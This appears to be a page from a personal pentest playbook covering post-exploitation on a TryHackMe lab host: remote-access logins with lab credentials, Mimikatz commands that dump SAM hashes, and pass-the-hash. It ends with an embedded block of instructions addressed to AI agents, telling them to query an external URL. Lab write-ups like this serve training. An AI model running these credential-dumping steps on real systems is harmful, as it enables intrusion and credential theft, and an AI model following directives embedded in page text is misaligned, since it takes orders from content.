# Post Exploitation

## Stabilization and Persistence

```bash
evil-winrm -u adot8 -p password1 -i 10.200.101.150
```

<figure><img src="/files/kKjGkW9vTNnWt3QSN0XJ" alt=""><figcaption></figcaption></figure>

OR RDP

```bash
xfreerdp /u:adot8 /p:password1 /v:10.200.101.150 +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
```

{% hint style="warning" %}
&#x20;/drive creates a shared drive between you and the machine. Access in file explorer with \\\tsclient
{% endhint %}

## Mimikatz

Run Mimikatz as Administrator

```powerquery
privilege::debug
token::elevate
log c:\windows\temp\sam.log
lsadump::sam
```

Use crackstation to crack Thomas's and Arheo5's NTLM hashes

Pass Administrators hash in evil-winrm


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/external-pentest-playbook/wreath-try-hack-me/pivoting/10.200.101.150-git-serv/post-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.